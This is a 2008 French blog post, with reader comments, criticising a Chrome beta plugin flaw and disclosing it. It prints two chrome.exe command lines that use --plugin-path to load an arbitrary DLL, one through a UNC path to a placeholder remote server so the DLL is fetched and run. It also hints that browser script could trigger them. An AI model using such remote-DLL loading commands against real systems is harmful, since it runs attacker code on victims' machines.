Faille Google Chrome : On prend la même et on recommence ! , The diary of EBArtSoft

mardi 9 septembre 2008 18:29 ebartsoft

Faille Google Chrome : On prend la même et on recommence !

Le 8 septembre Google presentait une mise à jour de chrome en version 0.2.149.29 : http://googlechromereleases.blogspot.com/2008/09/beta-release-0214929.html

Cette version corrige des "failles", je vous laisse le soin d'en decouvrir plus...

Neanmoins je persiste et continue de denoncer le trou de sécurité béant laissé par la gestion des plugins douteuse qui autorise l'execution de code depuis internet. Je ne vous ferai pas de demo ou de "proof of concept" depuis une page web soigneusement redigée : manquerai plus qu'on leur mache le travail.

Toutefois et compte tenu de la simplicité de ce que j'appelerai naivement "la faille" je vous copie/colle l'unique ligne de commande à tester chez vous pour le fun :

"c:\users\{username}\appdata\local\google\chrome\application\chrome.exe" --type=plugin --channel=0000.0000000.000000000 --plugin-path="ici_la_dll_qui_tue.dll"

Ou bien la version unc path qui, il faut le dire sinon personne ne s'en rend compte, telecharge la dll depuis l'internet :

"c:\users\{username}\appdata\local\google\chrome\application\chrome.exe" --type=plugin --channel=0000.0000000.000000000 --plugin-path="\\ici_le_serveur.com\ici_la_dll_qui_tue.dll"

Ce n'est pas à vous qui me lisez que je vais apprendre qu'il est possible en y additionnant quelques lignes de script d'executer ce shell depuis le navigateur.

Alors... rendez-vous à la prochaine mise à jour de notre IE/FF killer préféré !

Ce post vous a plu ? Ajoutez le dans vos favoris pour ne pas perdre de temps à le retrouver le jour où vous en aurez besoin :

Commentaires

# re: Faille Google Chrome : On prend la même et on recommence !

mardi 9 septembre 2008 20:38 by wizad

Pour ma part j'appelle plus ça un trou... c'est carrément un gouffre avec des flèche lumineuse pour indiquer par ou passer....

# re: Faille Google Chrome : On prend la même et on recommence !

mercredi 10 septembre 2008 11:56 by nickadele

La semaine dernière, TGDaily annonçait aussi que Chrome indexait automatiquement le contenu de tous les sites visités, même s'il s'agit d'informations confidentielles sécurisées via HTTPS sur des sites de banking internet par exemple. Les pirates qui parviennent à accéder au dossier système où sont stockées ces informations, peuvent théoriquement en abuser.

# re: Faille Google Chrome : On prend la même et on recommence !

mercredi 10 septembre 2008 13:27 by white_mage

Ce que je ne comprend pas est que cette faille n'a même pas fait un buzz sur le net. De toutes les failles que j'ai vu concernant chrome, il me semble que c'est la pire. Mais non. Tout le monde parle du lien qui fait planter le navigateur (ouhlala) mais pas de celle-ci.

Bon. Théoriquement, le navigateur ne devrait pas tourner en mode administrateur donc difficile de corrompre la machine mais il suffit de coupler cela a d'autre overflow et c'est la fin....

Enfin bref....un peu de sécurité sur les blogs codes sources ne fait vraiment pas de mal...(ça manque presque)

A+

# re: Faille Google Chrome : On prend la même et on recommence !

mercredi 10 septembre 2008 15:16 by Erebuss

Tu as soumis un ticket sur http://code.google.com/p/chromium/issues/list# ?

En tout cas, c'est vrai que ca craint ...

# re: Faille Google Chrome : On prend la même et on recommence !

mercredi 10 septembre 2008 16:46 by ebartsoft

blague: ah... par ce qu'il faut prendre un ticket pour ne pas se faire pigeonner quand on surf avec leur navigateur !

"Biiiiiiiiiip !

numéro quatre mille six cent soixante vingt douze guichet trois !"

Drôle :p

# re: Faille Google Chrome : On prend la même et on recommence !

vendredi 12 septembre 2008 13:50 by ROMELARD Fabrice

Perso, ca commence à faire beaucoup.

Entre les règles de sécu non correctes et la EULA vraiment discutable, le résultat est simple et sans appel pour ma part :

- On désinstalle tout et on continue avec FF et IE

Fabrice

Les commentaires anonymes sont désactivés

Les 10 derniers blogs postés

- Etendre le Team Web Access de TFS 2012 – Step 0 par Philippe Didiergeorges Aka Philess le 05-23-2013, 23:48

- Simuler facilement l’envoi de mail par Blog de Jérémy Jeanson le 05-22-2013, 12:52

- ProcDump 6.0 : support du filtrage sur messages d'exceptions .NET, des filtres multiples et du ciblage par nom de service par CoqBlog le 05-20-2013, 14:50

- Votez pour le TOP 10 des influenceurs SharePoint francophones ! par Le blog de Patrick [MVP SharePoint] le 05-20-2013, 12:59

- [Conf’SharePoint] Dernier rappel ! :-) par Le blog de Patrick [MVP SharePoint] le 05-20-2013, 09:09

- [ #SharePoint 2013 ] les modèles de sites standards… par Le blog de Patrick [MVP SharePoint] le 05-20-2013, 09:03

- 10 erreurs de compréhension concernant SharePoint… par Le blog de Patrick [MVP SharePoint] le 05-20-2013, 08:27

- Conf’SharePoint : 10 bonnes raisons pour ne pas la rater par Le petit blog de Pierre / Pierre's little blog le 05-14-2013, 02:24

- [Event] Soirée de lancement Agile .NET France à Lyon par Blog Agile/ALM de Vincent THAVONEKHAM le 05-13-2013, 01:29

- .NET / Debug : inspection de la mémoire d'applications .NET (dump ou processus live) : première livraison d'une librairie .NET par Microsoft par CoqBlog le 05-11-2013, 22:21

The diary of EBArtSoft

Search

Tags

Navigation

Archives

Classic Gamming

Guitare

My Friends

Special Thanks

Visual Basic

Wu Shu

Faille Google Chrome : On prend la même et on recommence !

Commentaires

# re: Faille Google Chrome : On prend la même et on recommence !

# re: Faille Google Chrome : On prend la même et on recommence !

# re: Faille Google Chrome : On prend la même et on recommence !

# re: Faille Google Chrome : On prend la même et on recommence !

# re: Faille Google Chrome : On prend la même et on recommence !

# re: Faille Google Chrome : On prend la même et on recommence !